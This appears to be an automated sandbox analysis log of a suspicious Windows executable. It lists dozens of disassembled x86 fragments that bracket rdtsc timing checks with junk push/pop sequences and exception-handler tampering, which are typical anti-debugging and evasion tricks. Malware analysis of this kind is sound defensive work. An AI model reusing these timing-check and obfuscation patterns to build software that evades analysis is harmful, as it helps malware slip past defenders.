Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 252D64 second address: 252E08 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D33A1h], edx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov ebx, dword ptr [ebp+122D23F8h] 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007F84B0D655F8h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 movsx edi, bx 0x00000043 mov edi, dword ptr [ebp+12462BFCh] 0x00000049 mov eax, dword ptr [ebp+122D0275h] 0x0000004f push 00000000h 0x00000051 push ebx 0x00000052 call 00007F84B0D655F8h 0x00000057 pop ebx 0x00000058 mov dword ptr [esp+04h], ebx 0x0000005c add dword ptr [esp+04h], 00000016h 0x00000064 inc ebx 0x00000065 push ebx 0x00000066 ret 0x00000067 pop ebx 0x00000068 ret 0x00000069 call 00007F84B0D65603h 0x0000006e xor dword ptr [ebp+12483D9Dh], edi 0x00000074 pop edi 0x00000075 push FFFFFFFFh 0x00000077 jns 00007F84B0D655FCh 0x0000007d add ebx, 4E59522Bh 0x00000083 push eax 0x00000084 push eax 0x00000085 push edx 0x00000086 push ecx 0x00000087 push ecx 0x00000088 pop ecx 0x00000089 pop ecx 0x0000008a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 253CFF second address: 253D0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F84B0B050D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 253D0A second address: 253D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D280Ch] 0x00000010 add dword ptr [ebp+12462B5Fh], edx 0x00000016 push dword ptr fs:[00000000h] 0x0000001d call 00007F84B0D65605h 0x00000022 mov ebx, edx 0x00000024 pop ebx 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c cmc 0x0000002d mov eax, dword ptr [ebp+122D027Dh] 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007F84B0D655F8h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d add edi, dword ptr [ebp+122D2C8Ah] 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push ebx 0x00000058 call 00007F84B0D655F8h 0x0000005d pop ebx 0x0000005e mov dword ptr [esp+04h], ebx 0x00000062 add dword ptr [esp+04h], 00000015h 0x0000006a inc ebx 0x0000006b push ebx 0x0000006c ret 0x0000006d pop ebx 0x0000006e ret 0x0000006f adc bx, 3CB7h 0x00000074 nop 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 253D9C second address: 253DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050E5h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 253DB6 second address: 253DBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 253DBC second address: 253DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 253DC0 second address: 253DC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 255A8B second address: 255A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 255A8F second address: 255A93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 255A93 second address: 255A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 255C7B second address: 255C81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 255C81 second address: 255CE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b js 00007F84B0B050DAh 0x00000011 mov bx, 4EA1h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007F84B0B050D8h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 or bl, FFFFFFD4h 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 adc bx, B0B8h 0x00000045 mov eax, dword ptr [ebp+122D0AD1h] 0x0000004b mov dword ptr [ebp+122D1D36h], edx 0x00000051 push FFFFFFFFh 0x00000053 add edi, 2F20A0F0h 0x00000059 movzx edi, di 0x0000005c nop 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 255CE5 second address: 255CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 255CE9 second address: 255D06 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F84B0B050D8h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jp 00007F84B0B050D6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 255D06 second address: 255D15 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 25D967 second address: 25D99A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 js 00007F84B0B050D6h 0x0000000b jmp 00007F84B0B050E9h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F84B0B050DAh 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 262211 second address: 262215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 262215 second address: 262227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jo 00007F84B0B050D6h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 262227 second address: 26224D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F84B0D65602h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jnp 00007F84B0D65604h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26224D second address: 262251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 262484 second address: 26248A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26248A second address: 2624C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jne 00007F84B0B050E0h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push ecx 0x00000017 jmp 00007F84B0B050E2h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2624C7 second address: 2624CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2682A6 second address: 2682BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050DEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2675B4 second address: 2675F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F84B0D65604h 0x0000000b popad 0x0000000c jp 00007F84B0D655F8h 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007F84B0D655FAh 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d jg 00007F84B0D655F8h 0x00000023 push eax 0x00000024 pop eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push esi 0x00000028 pop esi 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 267CA8 second address: 267CE8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F84B0B050F7h 0x00000008 jns 00007F84B0B050DCh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007F84B0B050D6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 267CE8 second address: 267CEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 267CEC second address: 267D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F84B0B050DCh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F84B0B050D6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 267D0C second address: 267D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 267D10 second address: 267D16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 267E2C second address: 267E32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 267E32 second address: 267E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 267FA8 second address: 267FC8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F84B0D655FAh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F84B0D65600h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26C4B4 second address: 26C4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26C4BD second address: 26C4C5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29AF0E second address: 29AF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1FAED2 second address: 1FAEE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 push esi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1FAEE4 second address: 1FAEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A4E00 second address: 2A4E10 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F84B0D655FAh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A4E10 second address: 2A4E28 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F84B0B050D6h 0x00000012 jns 00007F84B0B050D6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A4E28 second address: 2A4E38 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007F84B0D655F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A4E38 second address: 2A4E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A4E3C second address: 2A4E52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65600h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A4E52 second address: 2A4E68 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F84B0B050DCh 0x00000008 je 00007F84B0B050D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F84B0B050D6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A4E68 second address: 2A4E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A4FD0 second address: 2A4FF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84B0B050E1h 0x00000009 jmp 00007F84B0B050E3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A517F second address: 2A5183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A5183 second address: 2A5189 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A5189 second address: 2A51B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F84B0D65609h 0x0000000c jg 00007F84B0D655F6h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A51B5 second address: 2A51E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050E2h 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F84B0B050E1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A51E0 second address: 2A51F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FAh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A51F0 second address: 2A51F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A5335 second address: 2A5341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F84B0D655F6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A54CA second address: 2A54CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A5619 second address: 2A562A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0D655FDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B0BE5 second address: 2B0BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F84B0B050DEh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B0BF7 second address: 2B0C02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F84B0D655F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1F5FC0 second address: 1F5FF8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F84B0B050DEh 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 je 00007F84B0B050D6h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F84B0B050E4h 0x0000001f jmp 00007F84B0B050DAh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1F5FF8 second address: 1F5FFE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AF1D2 second address: 2AF1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AF1DA second address: 2AF1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AF1DE second address: 2AF1E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AF2F9 second address: 2AF321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jp 00007F84B0D655FCh 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jnp 00007F84B0D655F6h 0x00000015 jmp 00007F84B0D655FBh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AF5E3 second address: 2AF60C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F84B0B050DFh 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop esi 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AF60C second address: 2AF612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AF612 second address: 2AF616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AF616 second address: 2AF62C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AF62C second address: 2AF630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AF630 second address: 2AF648 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65604h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AFA39 second address: 2AFA72 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F84B0B050E9h 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F84B0B050DFh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 popad 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AFB9F second address: 2AFBA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B0316 second address: 2B031A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B031A second address: 2B0320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B0A25 second address: 2B0A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F84B0B050D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B0A2F second address: 2B0A39 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B0A39 second address: 2B0A7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pop eax 0x00000007 jmp 00007F84B0B050E9h 0x0000000c popad 0x0000000d jmp 00007F84B0B050E9h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007F84B0B050E2h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B0A7F second address: 2B0A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B0A85 second address: 2B0A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B0A89 second address: 2B0A8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B0A8F second address: 2B0A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7DD8 second address: 2B7DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7DDE second address: 2B7DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7DE2 second address: 2B7E04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FCh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F84B0D65602h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7978 second address: 2B7985 instructions: 0x00000000 rdtsc 0x00000002 js 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7985 second address: 2B798D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7AF8 second address: 2B7AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7AFE second address: 2B7B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F84B0D655F8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7B0B second address: 2B7B10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
